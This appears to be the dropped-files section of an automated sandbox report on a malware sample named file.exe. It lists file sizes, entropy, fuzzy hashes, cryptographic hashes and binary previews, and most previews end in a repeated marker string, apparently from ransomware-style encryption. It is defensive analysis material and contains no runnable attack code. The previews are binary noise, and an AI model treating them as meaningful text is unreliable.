          Preview:......'.....-..+..I...v....../..C..']?..[eV..+.T..g.rz..j.W*@a.yGQP.w.o.34.$....dKu...P.hsO/.h-%.D..2V..J.T.\........K...w.=8.o.=_..z...3)..g. t.[.V..a.*.Ifd..e.J.>..G.Q.h.f..i......O....?...,..h...5...Q.E.d.EIe.hk..M....\o.4.......8...l.......S.i~c..Pc".....f?.L....U....} .).....p.....WMKY.Ej $...S....u.....=O...^o..B...F.-q9..].+.29>..M......9].m..'.B......WO^.....l:U.L{.....?......... ~03..d.`.l.h.Y.T...._......3.q`.[....Wo.9.f+|..!.S.>.U.{.<F.2.ZO......S,.w..{....?4...Pbn...p.5..\.1v.......:B......'.|[..`....xO..z.z..TX....A..s6...5.%.f.,..~.1..3 .E3M.94....D.B..$.^.y..'2...H..+...o........V......R.p1|5m.e.1...F.).'...H.....zT|......\.!.PB..A..W...)bX....29.D...I.}F...A..`{.HLYF.x...wp..5.E..RA.]v..%....3r`t...,H.[ .l.....m.Q.l.1}x"%..4...b..P....r..tt1..#B. =....G......0.}..).(E..j.g...s...{...K.{.}\z.M.M.`..6V ...0.A7&6O..6sZD0.P...#yv.6.;..MG4....H..B2..FI3N..Ij@#h\.=...Ro...........Io....R....]$O....M.7.........s..-.RR.]....W..R.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):400
          Entropy (8bit):7.387513838582643
          Encrypted:false
          SSDEEP:6:SWFRTCWlDhapvK4beXY5A/gZAMz3kFpCMXT2ODCjGxssZacii96Z:ZTCpOo2/wAMbuoMXT2GCixpZacii9a
          MD5:2D83529EEC26E3E8BB7EDEA0E993890A
          SHA1:028D7C847FEF68A9F08442CF0880C8E7DCC9F547
          SHA-256:028E7B61D119DDC6109CFDFBA935A8E4BDE13A8C079ADF796E308B7BAF1545F1
          SHA-512:7E3548FECE356C2CDD42873A35899DC36D308D95CD2A7279BD8EFFDC12FBAAA80CEEE6EF330DB8D7681A82574D5127E23C197988788A513821E62628C24EAE01
          Malicious:false
          Preview:1.44C<b.ZS#.]Yt...r.s.uO.k:z.k.Pwj....i2.ah....)`!6.?....m....RG.Z>.$..P.........<..@.=.b...~......?.v..r..a..(..K.S.p..r....sw.D...v..Z..!.#..M...8...(._.{4..v....>.Y*.u...C/"0...3...P.OA.<R..i-v.....`...GL...{.p;>I7Ww.*.PY.....`.l...../xO./a..b.A.7..Pc.l.|. t.IR.3...C....$..).!.d......+}*A..'XR.o...tY...Pz.ur6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):447
          Entropy (8bit):7.4293715864627545
          Encrypted:false
          SSDEEP:12:Rc/zBZPukcIBLAQQXcnVFV+7V4PX6f/ixpZacii9a:2LBZWkdmQQMrV+WKiTkbD
          MD5:3952757C7444323BDB0029FE6A1FF2D4
          SHA1:56091B0620D4A0630BBC589CEF778D303F494C86
          SHA-256:48D83C46782044B9F8E8B46BEB5154605406BE2DE3F066C776231391FAEC5DA6
          SHA-512:93493BBB6F6F7666BDA0B42BDD8CC4DDAD9D5F3C5ECA4685B9623945A1D78CC4AEA77CEFF3ACEFA8BABE08837D9B7BF7F25E4F60654E33626CC13C60AA296E21
          Malicious:false
          Preview:{.. D\..>D.P\E.~.LX..k....-._T.......6k.~Q<.6...&>.....h./X.Z..._N.9Q8-......py...hd..!.\..RK.u4.ax..?....?.U.....3P.+....6.b...#...7iG.@nK...V...i..NU.....q...50qw/..#&...+F....;.$....)...\..&[.X:6_....a{n..{..W....b..XZz.c..CG..{$...}2...]a..n..{...@.t..=..V._Y|.o....W..,(....5v...aS...^N...~.g. 5..._yi.oM.3. .....Qb....3...6.&...%.).S.@.qr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):480528
          Entropy (8bit):6.569744209231619
          Encrypted:false
          SSDEEP:6144:J7wUfHlmNB2O+GjRPQFZvtpyZ0OG1yJG/dKW2:JEKYHOjlpDpV2
          MD5:694D5B8EA99135B11B19578539A9B8FB
          SHA1:1DD3E6909CFDCCBAA2C2C41EF83DF76059DABFB0
          SHA-256:79E3CB8DD10E35FB7C9AE5538369CA9A7D2B03D97623984E287518719F7D247F
          SHA-512:EA286965E304CE8DF3D29A3B7E1DFCE6B77BEA546197BD9CD6B4E4A05189CBCEE1C6FAF0B47AE6A9484C8EB92B541152E004CA4117106E9ADD6766CCC97DE885
          Malicious:false
          Preview:...m.i....P.b.-<C..y.....;i..~`@.M......=.d..#.7...@...9......1..n..3....I!#.....-cb#!...B.!V....:vm.(......l.g.`..?.`..A....B..s;l.ep.../..T.x}t.g...!...TE.K...MY.Rp..,@;.......1.>Zy....|..8...(g6G..0...*q..;.:1s.}z ...$...+...-.c..'.K`,?l..,.9.6..%....A...+..S=..:h.i.N....k..hZ.l....nu...$...hP.n.bN....!..y6....}X....Z:..y...(.>}&0..... u.......GU....1F..V.".Z.W........M......vS|#"........@....B...on.`..T..d.....?.H......pM(;.ep5.[d..[.F.....,e.).,.6[.....3...P1..S.x...S.\.....n.$.%c.....o{t.&.V.......D(.$..Qk3.?...:r..z.q..z.F......p.....2.*x.L....(...(E.....G..3&m....h.LVU...H.D.e...R.....H..L.2.1C.2..).,.g...<.{.......:..>../o.8-'..t.j..9.......rW....5.a.pt.4..Dbq..,...b.y..7.sSmA...o..brO!.e..V3X..6...$..f.X..V..G.YFJ^......+.Ti$JJ..,...."DaT.(.'..........Z.j..b...S.Y...|.......F5:X.,..<..oo..O.$O..............#.^K..4.$..6..,P..0". ....t.7..;Uz..p..."..q...z..2.CM.5-.5....c(.$n.$..@~6.`.z............../zK.Q!u.!.B.TQ..}.l.._.X.`
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):674
          Entropy (8bit):7.652099488690314
          Encrypted:false
          SSDEEP:12:kKl4uSnRaunDfLwuy/l/zw9KCJuxHyduwZjQy2pNzsxyxmjWL/3SaixpZacii9a:/C4uDzRDtJJcp6ZjMTiTkbD
          MD5:C4070264555B44D4549772166BC53B7F
          SHA1:ECECCD5C4F0F9766AFF69DB3FF8A97D2535C14EC
          SHA-256:5DAD120A52503161E93F15FA328D28F64E2499ECEC742EA4B139219C36056499
          SHA-512:EDAD797CCDA80FCD9796609FB0C463016C2F39D6D8E8FD40966704CD3E32DF62538CC190452C375CC6319845784081608086F0A7D1D2349F7AAC39E9C7B60DBE
          Malicious:false
          Preview:2023/..O0..T0.V....T....A..D....n;..I....s.~..k..=........../lO.......9.&.s.s.6,.X ..:_..oA.j|.Rny.....`......}].pl$.x......e.g.J..\.%.>B|.yZ..'[,..9.....S....c......S.j....Wx.AnlrJ}-./F...b....3.f_q..B{...,>..;.n.Q..;.*.;..d..........i..tK.B.I.....4.&.$.eJ...:F.J......k}.r."z4..P..K.-.gM.....]..qX..*!0t..6R...,...qR.uo....S..%.Etz&5CE ...]fka.... . H.1.Y..}.k.`.+.2..Rf..&....v.......H+.........B.....@PB{@...4B..lI&...+.V..........N.........%.B.].u..AY<,;...'...%=.p...oT...."z0.,.........T.B..e9......r=.Af,..1zr.......n...O....p.$..YI4r..j......b...QP.K.!G.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):367
          Entropy (8bit):7.304560327013145
          Encrypted:false
          SSDEEP:6:iPgt9OPwvLITBAY9Oif7YHoWjqc1TNlt3dp+Wlntlpt/tDu9Ha4pn+m7jGxssZaX:s4OPPk876X/1T1rNlLj/tUHvd+m7ixpW
          MD5:D84952C9590425D761EC05E350563C46
          SHA1:1D5B08E6C226F3BAE4A15F8F8B6DC0D9478339CA
          SHA-256:207A3D7B9D02D103ED0E96E7758381D187616E44F38C081C406D62FD50626F52
          SHA-512:EB0C1892DF877F879CCC43D7C08BCAC329BBE8E358DB31667C77CB3289DDD5FD621FF008189AEBBAC510CE6D863A9C397A7C4D2AEA7E89ECF29BBFB31C1D3B64
          Malicious:false
          Preview:...m.1.2B..I..p.%...\+...K`r.*I.#....F?.U...`.t[-......GN..p@4.z.wt.gC$.l...%...Z....fT*..:.B.!.S...EjB5...y........w..)...\..4..v..M....==_.>..$X...[Rp..4.W..a...$......PD<.$..@.[X.{.3.z%]|~H.....m..P....9..x.G.p..2X.\.....&..<...Y....H."2.g.P.Yqcj.d..!.........[..U.=.:.5..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):686
          Entropy (8bit):7.655023161078904
          Encrypted:false
          SSDEEP:12:kEi9qRP+ovmrlVWMX3ZyXnzHnNnA1MSviFKL8mqxTI8n9u8ixpZacii9a:AAmHMGIdAbp8mETX9u8iTkbD
          MD5:9D5C41A8BBAC7D044CE1A42FF1F9F2E7
          SHA1:61EAAA4AD3734BE0A770926B1201719B0A73954D
          SHA-256:CE1DB9D3B2E19CD89A308A560BA6D7328D0E1A81F9B1BA13C191E96A617AB51A
          SHA-512:DC8174CBB0ABECDF176E667D552648C25278847A0B12B24FBA25741B363DF7D8B5F09C17434484788640250D4EB11DB5EAA9DD508326A96661A5FF18B3132B6D
          Malicious:false
          Preview:2023/.VY.A..~.y.HQ....H].A..wO..|#Uw.G.-.=.[.$....89{$| .}$....Y.^.d.#....K..Rd.k;..u...6/..f.u8./. ........*.w*.d.....r.A..?1.c....j#....HJ^!....~..f....\.:..2..+.^=P..Y.nn.s3..17.........Y...1...0.R...O+...!...k.....#:+..>j..\u2..R...-o..g..]y......>...(...j. _U.dKJ.....o...0..r..#..G....Mw.e..p_P|....= A..ln.W.E.....A......._.o.v&...>.>....'.-.....yy..,.T....l...mR.Unt.R...Cs.....!p.....h..-A..l..k!...r.Vs......:KS.^.p.....:....F..n...q..Qdr.B1m.xX[].$.....].D._.#.....Z5>.,.. .'N.+:.....M.........4...nCv.J...%.\..Bh.);C.T.fi3.^..V.Q..<..S.y1t...zxT...v4.0..w.*r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):33102
          Entropy (8bit):7.99512514241929
          Encrypted:true
          SSDEEP:768:v7bPMur4SocQ94dfYbVFTpGgp1pEyeEOZB3TnaT26cGiATSTs2O:XBr4hcQaObVf55k/n56qqL
          MD5:A7CE1E9D81AF04EB22F7B89E6C09B1E0
          SHA1:B95AC9A615442440B19C2BDB5AEA5E0603366B18
          SHA-256:3E03D1C9602624C2FBA2DAFE93A0E3438389970BA06539762AD4EF687044B3F0
          SHA-512:FD8D1F0CC2D802E0CEA6195526CBDD66CC2A3F76B6CB5C7256B7D30CD1E75D8CB55F75219CBBCC2095695B1E6A8D64648B3BF2C2641B780F26C7D8F3D3DF30D9
          Malicious:true
          Preview:SQLit...ap..K..e.x.....:P....J.(..".....8.~Hd..`.u..Y.....EQ...I.Z...|.7...D..O...h.........6..03.N#..l.......j )+z..8...........y.J.......:....]o....+....j.%'..........nE.C@}.}...x"...h..).e.......+...Us..|.Gunk......$)\8.w.V..!-..z...=[fM..C).q.^1Ih.=..7.+.&pZ...7?......:Wqo.....?.Rc@d%.......]../........a......smG.L..mt..}.......5.YX....:.+4.....5...-...g./..XX.t=.C?...Y@o..y?.......1'."..<..~M'...F..;..\...v.l=X,\c..k......G........W..(..:......a$..r{.......:.R..d.......a3....&%A.>.J....7l....R..g.H)....^X..^k.3..9.`..o.......L..N..6.#.....WC...R...>......j.~.P.5..M........O..d##....>..-.>.q.V......n.a...H\....a.K.("...(..8...OBo.0.....[...1.8....@..Z6..c.........$..*Af...S..R...t..Uv.5.B.lg....G...8........S..1....-.G...&...~.4.P`...hf'.Tn.4..v..]..._?A..M.0?a.p...:..... .Y.*.u..*9h.....i U.=.....Me..e...s..8..J*..$3.e.....V,....^.$...{$:V.A.+I,....+....Vk.z..\../.Dr4.Aa.&F.........G..^8:X~&.J..&B.}yp6.zr.8n..c"..t.Od.o.L..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):20814
          Entropy (8bit):7.991439504221884
          Encrypted:true
          SSDEEP:384:zWh6YK5LDA/ms1f4DQtsK6VilSoEtHZhb01m7bMzvoax+ewiVY:6h6YK5vA/mshhaK6VigLPK87bMzvNFY
          MD5:05A71FEE2BC41B481E00FEFB351E2581
          SHA1:9125E6E322169083BEDE762617FDE72455F38902
          SHA-256:1EC0228C0F923F582484E5F15002A156D017962A71E4224E74422238FA8D35C2
          SHA-512:F237FDDC69EC0BBCF3B60BC220E7EACE86C0C64942D30DF5DEE585FFE90D7AA210036BAB94848D61807AEA7F9C534B684E953581EDC4BBEDAA15ACEC06167C80
          Malicious:true
          Preview:SQLit@.2Gl@.....Lo...G.0.U.xy...Z..Y3...1...m.]h..V..1..........rG.........W.L...V....-....7.-..w:A..R....qq.TW...2..im.,`.B#.G,.A.......\..U.y.2..U.G..v_2..=...4..%.....#Xk.{...%.K._r0.1..kmO$......ou.W.....z..=;.W.X.!...;-"I..."O.Z@..-4...E...H..vhz...5...z.Z....$.:.Jku42..A..b.u.(u,.V......e.}V.%.}&5.w."H....g..v...;J.N..N.9....dc.b..T.......L}....E..4Y.s.=.+.*.m.3...B.Y._..,..../_..;b1i.9...z..9.BL.Qp!A..^.....X.N...?...V.1.@....iq#.`M.i...z..`I.q=...0.n.......BM.%c..i.6...g....2..[.a*'>@.Q...}...!Y.e...A..\............./..5..~-,.2...x.).Z.........sU.....0......S......7..^.Xu..........B.:.[.....>.M.E/.I.O=........5.|I..G,...*....-.a...h8...q..Z.R.v.G....cb.n.j)...v.j.&...P.0|....G+.1.T..1..:[ ..s.`.<..N.R67+1q.Z.R..q.o8.....7<7?.h.X5..(.W....R[B..4.3....~;.G.=..z.|.}.......>...R;.3.U....A.7.n.C.S0........!.qM.i.I`.'...rNP......d..+0...4.u..8.};+5.#Qb...C.@.........c...t....HH....3....N.n..[*...;}.#H.K.q.....M....).".E.^[.%...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):543
          Entropy (8bit):7.584306894786631
          Encrypted:false
          SSDEEP:12:qvragkxLYQlkpyAcExPfwxWzv5i6/wHuM4S4Mrl+dixpZacii9a:yGRxLXlkpNcExPYWzR4Hd4IlWiTkbD
          MD5:9CF00871FE279CE0E25FB110F0D4557E
          SHA1:DDC400708C475EE643059916B279C91F1E516EED
          SHA-256:F2D9F83E67D7058DD2098E5ED85BA341DDC058E291CB2DD97BDD5833B61C67F3
          SHA-512:262B7E6A005F020C2D958D88F9832D45748C950E3B9DA969AFE92C8B54C6EE042931724C692F68EDA9BA98F8920F907714DF3C932B260328090624A834494A5B
          Malicious:false
          Preview:.f.5.gq..F0..L.#R^..ZO..........*{.B]..n*J...;..&.o..).O..;~..k.PJ..vR...A.t2nW...|.VP..l....o.3...&i...9.R.!zA$.....`..c?.G...~..u...f.L..ND..F..o".t\..^=.j.........Ho.{...8..........<Hb....6.2..)f}..C...}..~..d.. -.............xLy4D... ...Q|xp....E.&'QFs.#..b.p.....`..A..X..t..r...{..._....U.u.1GHxC......+.q.......R........W..g."FY.....z...l.sp~...l.R.c!.A....R...Fv."I..t.N.'.pu...8f..../.>...F.O(....P..%.....dy{.X.a.....Y........r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):543
          Entropy (8bit):7.618470781432073
          Encrypted:false
          SSDEEP:12:qNSt3QhhgaWytJ4eCi5TyduNcOjhh9emeXWZQVixpZacii9a:CAQhhgaWytJ4eCCTy0r1hxeX4QViTkbD
          MD5:B476DBF9940779AFE5D89B7011122AD9
          SHA1:6E743A0462AE5F61399019D981816170F505812A
          SHA-256:8D64CEDCA11745DAA99EF4ED0EDEA4AB18EDEB1EE18C6312366878E51B576DED
          SHA-512:12D82D8A4BAF2D033DE8FD04A40215FF28B329B5FE5255FD1F27ACF68E96E1DAEADC1C4E004E772441CAB43BF89453C15F8EA88C9A09ACEE114EFF58DAA7F170
          Malicious:false
          Preview:.f.5....B%.ZT(M...o....*.W.."7.q._}iGTqv.Y..*....b.}R...?...........G..~n.Jv...i[L........}..b.wW....1.B^L.....j.!m.}..7.F...l...v&:.`.M...v...i.b.1bb*.h..8..O...R..r.W$..Y.."?UY..5=...l.6..g..4...z..eI.#..........b.1'..C...'..V..T...uN....M...n..>z.....Fe" K.. .bibw\....1.../.`Y...5f..2.`....w...3s.......'.o.......4.F.nx.".....[2...j.]G.3;...!-.<.c@.sQ.e.?.r.kO...T..C..J..?52YG.....J.g...(H..t+..O.?..<..f.g.9P.F...S..S...YhU....-.@..R.>,r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):961
          Entropy (8bit):7.749730187122332
          Encrypted:false
          SSDEEP:12:qtZMVP7jY8v5q1KPPrJKiC2nQX9yCuRtGLYOaWVucufqS1s+hX6sxUD5e8etlTw4:OUfYXKPZ1nbWox1sWLqD5eiZg/iTkbD
          MD5:45AEC29D529E1952F3DF0C8E2DB47621
          SHA1:DBB9D2BBA07986994CBAE0547FAAAEA4AAE40146
          SHA-256:C2E1D6CF3BB93317F7D983143B93948727E20460025969FF0CF8D9732FDB60B9
          SHA-512:CB9728C6E66D98D05DC585B65538D48162DC5553AD16492716280703BE979A5ACDACDA9FAE682DFC352C8C31636A5D43FEEAC31C4F7E3CC60E9C495198DE54F5
          Malicious:false
          Preview:.f.5...B.;S....SZ.A.....b..8..J..\.g...M?5^>d.....Z...e.&....d..}.]V.....I.4{.H.....kC]....j.........!.....L.S......+,.7..y.E...c......+.n.<e..H.*.<JpK....z...Za'.iU.....+,z#7F.m.+..c.....".j((.#z....?>..p.u.........zl5$.L..j..T.@....(Th3....9.1...q..........#...X..F....7e...q...S..9...|.#...b.r(Z..q`.-h.4Y.(..e.k`)f..Q.J.w......T.q{....d..C...3.D........s...v..)...%.at..i|.I.......iM.4....=bX..+......<.H./n..$......9[..9X.hB>P.4..!{Z.I.bs...q.d.Wap5.0F..Y....=/A%.!?.nA....T/..&.f.X.F..wn#...H.4.).c....>.)._.mu...H$A.$]...3.y...".eOqp..Yp...,..{..S.Y..SRWZ........v..'xWm..~.....M....x.;...?a(`.;.......GuP.j....\y.]..............6........M.......C.ss...7(2cZ.G.....z...PS..]..f...fb..7..I....>2.1.M..|.6.Tq..rrA..;.....H....S.O....p.....1......b...oo#.a...".x}..L......s.lV..*...k..x..n.`D."7Y..EL.!:..C(.s.8c..skn...r.5.T..~r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):662
          Entropy (8bit):7.6016411252316995
          Encrypted:false
          SSDEEP:12:kqqh5uNg/ghlLhiSWQ9LvCLEqT5LTdKDjvt+TylogMqC1lW4iypcY0zbA2M05Oi1:oh57/g3gCkLEqThTkjvVMhW4iXYYErmv
          MD5:46CA5376224DA244BFEAA2CE2909D795
          SHA1:20AC1A69BD7E3F46BF28108157F7DAC818720B42
          SHA-256:C94C5E340658B20B872C60CF98E988D3B7C4BD4FF97F43957E282BD6292E245A
          SHA-512:9020D118A1DE8C0E57130120088EEF00EACCC7910F8F4B674D09EC3959E2A35D1E34484B3BD6D2CCCF04E23352D9CB158200A9D010ECB727EF2044EF494E63B6
          Malicious:false
          Preview:2023/.S....s.b...q...z....@..1..&.R...hH.4?2{.............<.....7..Z.^..o.0E..J_..wbLB].7_~t..P..y.|.d...../=RI).6..|.l...t.xoO..l./.n...q;s-... ..Q.oE}."......,..4V..D.$..D.^@U.D..."....d5a...K?D..`xM............O.&(..&."..'..78%q.*..4.x.....k....u{...28.6-.Dn`.....,f$n..X....\.-.#..T.....x4..<.. ..<...t.wHW_...|.....T..F/>.?{...@XTf....K.u&9.f.qz.,..x{.EJ..E.........}..txg.9...\.._....B...D1..lw2....q_Kyz.0|9r.M.... .i.+?..pM.R]M.C.D.fR(..Nn..G..\.!...q,T...w,.T.) ,.&V.!/..a..+....}.....o_......M.&T.....fc..]......5.l.c..)..iO5..6oz.|.V.mBS...?.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):5316
          Entropy (8bit):7.960730354883798
          Encrypted:false
          SSDEEP:96:RDcAWQtE+iWvLV6yV1jDHLUEPlFtir5Hj5h8rWF/CZcXhH0mnOvsMUIc:RDc72E+xzVPvplriFHVKr4qZEUsp
          MD5:B516B77DAE734B20DE804F76188F5ED9
          SHA1:698C5D2790E37FA50DDDEB7E17F8570E52269136
          SHA-256:F03D06C94C6B3C39DB81F33E16C897BB4143A788EE7C53644A9E26E2C8ABF75F
          SHA-512:29014062CBFC0CB0EF77957BC1F3178DC2ACB947C49A5D314D0BBE6FE80ECAC7216075FE31260A98598D642ED493B10D51D5071E767EA39397F1FA2027EA3F84
          Malicious:false
          Preview:.PNG.....ttRtY7.=k...Dq...s.Q......f...8.y..wE...I..Wq.C.I....?........R...$3.......!..._2..v.Q@u....ww&..R........3.....!..&.."1.|.y.f.Ps*.....)..QL.i......r.D.3..4su....A...E.....=9..zo....&?.ZX.se.#...E.^%.A.Dp\V..4V...U......zR.#.'.........Q...........~.}%.nr.....&....Z..=.w.u..>..kv.d.....m-.v..aT..'Or......Q.z..[.b.X...dj.[.U|.`g6>.."V.z...<......9^w..fJY... ......s.\...f7.v....S......I....zc[.m..L]0....'.D4.8_..=v..f.9....m..5.`.X..h.W.....r.CF.K5d."e....N..+.G."W.s...6.....I.e).B...;..T..$n...b...D....}..1....Na..n.d.h....X..0....r........<7...Q......e..D.L...JO^.....&.yy...W~..'.K....}aI...KZ....(;.HxO.S&}...q~.....S(..r{.....`..R...'q..j......1...)r.o.T........{.ST......T..N...V...A.>...N..2....a..E1.N.<.....#..wp..$zf......7.4%6)J.....g...U..@.HX./.e.[....4.C%...M....>.s(....b...7W@........,')..pmId..|_....t#.,...h,...'...T...=MteZ....*c.TV.Z..Y.....W....q.$..H...H..}....R...=....e~K.X...8../[..E..n5....[..n.I....$
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):18852
          Entropy (8bit):7.991575246199495
          Encrypted:true
          SSDEEP:384:NXqJFI3KuXb4FDpOsNNJkP682MvgET2h+KQJtAFk7GV5f:SFGyFlNDSPP2MvT2h+tenf
          MD5:F5C56E354357ECA1366268C910FCDA69
          SHA1:D023FB2C2275E1035909C390E7A1E6DBDD79CAA4
          SHA-256:2EFEF52543D250F44662867652B8524800237F666E6E466FA63CE56FCA51BC45
          SHA-512:E9D44CC7B954474225DDB2A667AA5604A8B609DDF41A211E0C898FF244C5D806C9AEC252465BA54A3D30957B7DDBA65F837B602C1FAA862BCCD5ACF6F155B3A4
          Malicious:true
          Preview:[{"de..F........kak..T.D.....5.....d../..."FoPH5..O..=B.\......a.o...GtP...SS.`y*...:"..).....&...w..+...^^.:...o.X..r..%.......{|L.4h..%>k3.........ibE.....:W....z.~.+..[.`...g...Xp.H.].>..~.....H..y..@<(+......,/.<.`2..X.Q~.i/.E...Q..j..S.:....w...h..0P..F'...a.m.Q.)....o...hC...".8.f.,.5.w..`..G..E...@..]....NW......2......BD....J.]...wo..RT|$..fd.=.Dx.R...r.v..OZ6.mz..v..{*...c..V$1.._.. CZ..*.e....|q-5.K3...=...>F-.eb...-../.e..C)|[.*K.Y..OZn0...}dd.z.vh .....(.R..p/...K....V6A.H".....-..v.8..I.O..}...........m.M.v....f.iI..P....>....V~E.r...pFh.uH.`..~...P....Q.,...z.....&<( i.....o..P.U".*.r1.?........,.<).........gf....O.J)*F...!.J.d..20..a......y.B.4.....r.S..C.h.P.=jX.l..c(;S.6*.S.........V..~..a$..S..5+ s..=%%"........~'...Q.ko.6LgE..Jw..EgEX.....a..(........,.{.x..../(...$.p...tz"............uZg.j.G..kV\:...r..y_.._.o.....]...s...'.......I.'.,....?....u~?..4k.xQ.]j.....J.$...u8.<.....w|.u......."..CG.P..D..=....S..8.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1188
          Entropy (8bit):7.828031688063728
          Encrypted:false
          SSDEEP:24:AK043afdXCkeYeT0nKahyNAtQzThzWUIj2b2pOb7J9jMRT66uYZiTkbD:AK08wdS3YBKaINTlyUj2pObti6fiD
          MD5:C32B53D3E0579820B61E64955B42361F
          SHA1:E112083BC50B248CD6684173B2C9A009939F928D
          SHA-256:5EA3C4F6B008365D3B735854253593314B41986E33369D3A63C5062D583FBA10
          SHA-512:A25D05277E1412718B1A2FFB2F4CAC3DD44B1DF2C7D26807683DEB5311DA582BB2A1CC0BEE7E093C4E6DFCA6B7D82028D6FA185000BF0C118D335C1183745BFF
          Malicious:false
          Preview:{. ".(+9..B.u...../.4...6j?J......94..gk.T..>..E3..Vr...\.*..a....BP....7.D.@u...;.\.!..k+.f.....U.........?f.;.."..;oW3.ZE..K........)z....@......c*..+.{.'...f_.&....R...R..c....Xj.....i1.u...z......9.;#1.?....T.@...1:....._.).U.'.g...3d0........kD..$......].+Q.P"..{g.q!.`..M.5...>9..&.K.m.rr.WZ..d.V..X...pI.-Y.....8.n;.DQ..NN....1g..]|N..=/^R.7.......:t.2..?....H1...-."..0....t...^|.%5.&\se~.W.Z70@.... O$.3....v..~.J.7..b..?..._.....Du.)..@...[.1...;....t7......2....S.S..G.w..K.....P.jm.............z...+.h}.+...G.uQ..E..ai6@.z^#V.8...~.K...d#,h.n...j[.\._uE-.l.....hm.....u..N\..1.s..Uj........Q=)..5Q.Q.3.<1!.....mg...uJ.@....ya.cr._7.4....s.......:.).......`.W....^."-..SH(u.&V..i.....mU..V........~.$*y(oK.v`u.&..5.Ov.e...k.M.Q...vI11.1..\.@:.A|g....D.M........Z.2..X.....}.O.d7..Kbh..F(.........{...YL....&W...6J.U...e_."7...3-#(M.d..]jJ.X.........UX..%.0..._..&..*..::Z....ka>. .Z.8.U^..v.#..s..i.i.5m8l.l}|..o.....hc.F.PQ ..2
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):80603
          Entropy (8bit):7.997794352602355
          Encrypted:true
          SSDEEP:1536:P9UnOx8mhvtPXsLkREW1iXUTnxADY3JFejbCvrgMGG7tHc9pZfb7CUl:P9UnW5JsLaiUADMJCCv0MGG7tGLVl
          MD5:F83ACCAA4C2A939A13AA1A3B4501C918
          SHA1:B541C11007E5ACC954C30C89305CAF90774128C2
          SHA-256:39B3DF009C91A76AE73FBCC5B628E9FEA54F67F736D79E5B04086BCED5E6C987
          SHA-512:8E54AF2AA8E8F014D7998AB7F82158F7D3D967ACDAF876B61535738E8A6B2FC7AF28C6177C2B2D74FFF9E0069993C691F63A8FEC9CCF00B463256110EC257AF4
          Malicious:true
          Preview:/*.. ......].....Z .N.0......p.gu.?.g..k.z..1>*..kLa..*j..B.Pl....Z..........8..U...`:.z...x...sm3.t.r..?......p.!^...l...5..F.l...P.x.. U.`.}?8o.~r....~....'.....s..p*..a][jy.4.V....'......Z..<{....%.r..i./....=.ij.i%...w...F..Z...ey.&7..M%....nl.8..o.x..._b..gu.*..S?...9|.f...dM....[B?...a..E..A.}....&#.............R..s.r}./G7.'..2.=...~OE7.........?.E......O.nfz.0.C.wv.].H...\...V,.....xo:^..!.w%.T.>.kZ..9...O..x .-.#|..B......B...G`.w.r...1`.c9.........[....B.b...y......i.}....A...+h..<.?@.U...f^...J..a.q....u.l.6>.....,3..g..)!.'G.4.....z.M.};GY..c. ....XX...I........#E.N.6.c.].nSSX....8..f.+.%c.U*0..1...!...@K....Y.}b......X?G..CJ.....\FY..9../E=.}4O...F.....<....[...9.X$.;......9..f.z!...!....S3.......C.|.P....8....g...N;..=(c...B.2.......-..'$THL.._........,.c...v..'.$...B.V,V.u'...R....F@b.].\.......?.....X.R.{...W;.H.p@...M...q......[...a..J...E....kb.....U...E...8...N.....]@...K>.%1#.NA..T#..d/.P..*...+2!..F.....3.j~.7..`]a[...1.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2731
          Entropy (8bit):7.918837963134238
          Encrypted:false
          SSDEEP:48:QZFfHWYlnWwtDlMOuec1pjZ+oa1F23cQv8a2RcIe8BGi+vHcD2T6iHrn78iP5wUq:QxWYZjcTl+xLBQvt2RcmG1cUrwD
          MD5:59D4FECD80BF19922209EFF2BE96BD65
          SHA1:ACDD5F75BB7215B64D7FA287DA2D3C663143FA8F
          SHA-256:A5E73C72C59DF6E9CD3375E91425F69CA22D4EB2C837E1C0386D377A1EE20441
